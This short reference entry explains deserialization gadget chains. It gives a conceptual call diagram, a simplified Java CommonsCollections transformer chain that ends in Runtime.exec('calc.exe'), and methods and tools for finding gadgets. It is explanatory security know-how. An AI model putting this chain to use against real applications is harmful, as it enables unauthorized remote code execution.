Deserialization Gadget Chain

Deserialization Gadget Chain is a technique for exploiting insecure deserialization by chaining together existing code fragments (gadgets) within an application's libraries to achieve malicious effects like remote code execution.

Concept

Rather than injecting new code, gadget chains abuse existing, legitimate code that performs dangerous operations when combined in unexpected ways through deserialization.

Chain Construction

Deserialization triggers chain:

  ObjectA (deserialized)
      ↓ calls method automatically
  ObjectB.transform()
      ↓ invokes through reflection
  ObjectC.invoke()
      ↓ executes
  Runtime.exec("malicious command")

Each gadget is benign alone; combined = RCE

Java Gadget Chain Example

// CommonsCollections chain (simplified)
Transformer[] transformers = {
    new ConstantTransformer(Runtime.class),
    new InvokerTransformer("getMethod",
        new Class[]{String.class, Class[].class},
        new Object[]{"getRuntime", new Class[0]}),
    new InvokerTransformer("invoke",
        new Class[]{Object.class, Object[].class},
        new Object[]{null, new Object[0]}),
    new InvokerTransformer("exec",
        new Class[]{String.class},
        new Object[]{"calc.exe"})
};
Transformer chain = new ChainedTransformer(transformers);

Finding Gadgets

• Analyze libraries for dangerous method calls
• Identify auto-invoked methods (constructors, finalize, magic methods)
• Trace call paths to dangerous sinks
• Use tools like ysoserial, PHPGGC, or custom fuzzers

See Also

• Gadget Chain
• Insecure Deserialization
• ysoserial